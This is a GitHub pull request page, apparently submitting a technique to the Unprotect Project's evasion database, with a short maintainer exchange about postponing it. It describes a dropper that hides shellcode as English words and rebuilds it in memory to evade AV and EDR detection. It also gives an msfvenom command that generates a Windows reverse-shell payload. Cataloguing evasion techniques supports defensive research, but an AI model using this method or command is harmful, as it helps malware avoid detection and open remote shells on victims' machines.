This repository was archived by the owner on Mar 30, 2026. It is now read-only.
AV/EDR Evasion using AI driven payload Obfuscation#65
Open
ghostpepper108 wants to merge 5 commits intoUnprotect-Project:mainfrom
Open
AV/EDR Evasion using AI driven payload Obfuscation#65ghostpepper108 wants to merge 5 commits intoUnprotect-Project:mainfrom
ghostpepper108 wants to merge 5 commits intoUnprotect-Project:mainfrom
Conversation
Member
|
Thank you for your contribution. Since your technique relies heavily on the attached code snippets (multi-part), I'm unable to implement it at this time. However, I have planned an update to the database and website structure within the next few weeks, which will allow us to handle code snippets that comes as multiple files in different languages. Until then, your contribution will remain pending. Please stay tuned for the update. |
Contributor
Author
|
Sounds good. Thank you.
…On Mon, Aug 19, 2024, 3:07 AM Jean-Pierre LESUEUR (Microsoft MVP) < ***@***.***> wrote:
Thank you for your contribution. Since your technique relies heavily on
the attached code snippets (multi-part), I'm unable to implement it at this
time. However, I have planned an update to the database and website
structure within the next few weeks, which will allow us to handle code
snippets that comes as multiple files in different languages. Until then,
your contribution will remain pending. Please stay tuned for the update.
—
Reply to this email directly, view it on GitHub
<#65 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AE6DLFCOBVS4P3NXAP4Q2XDZSGKTDAVCNFSM6AAAAABINFGRY2VHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDEOJVHAYTSNJRGE>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
AV/EDR Evasion using AI driven payload Obfuscation
Authorship information
Technique Information
Malware detections have evolved overtime and today's machine learning (AI) based detection tools like EDRs are extremely powerful in detecting malicious activities because they are not based on static rules but they are trained to detect malicious behaviors when a piece of code run. This technique uses AI to evade the AI based EDRs/AVs. With embedded AI in malwares, things change a lot for both offensive and defensive security. It levels the field. Its not easy anymore for EDRs/AVs to detect an AI based malware.
TLDR: After the payload is generated by AI module and the dropper is compiled with the AI generated payload, the dropper is executed. The dropper connects to the AI module, sends the English words one-by-one and the pre-trained model in AI module uses mathematical function to fetch the payload from the vectors for those English words.
This project has the following files and explained below
payload-generator.py: This is a payload generator created by Byte Viper AI engine. It converts raw hex code payload (for example msf venom) to its mathematical representations in vectors using the pre-trained machine-learning model. Here are the instructions on how to use.
msfvenom -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f cpayload.py: This python file that goes along with your dropper binary. This file contains the code to get the english words from dropper and get the equivalent hex code from the AI module.
ByteViper.cpp: This C file is the dropper file. This is just an example of how the payload is embedded, in seemingly benign way, using English words. This code also connects to the AI module to get the raw hex code and then assemble them in memory one byte at a time, just before executing the payload. This code can be modified to use many other techniques including remote code injection.
tasks.json: This is the vscode config file that I used for compiling the code
Pros
Cons
Additional resources
Code snippets
Detection rules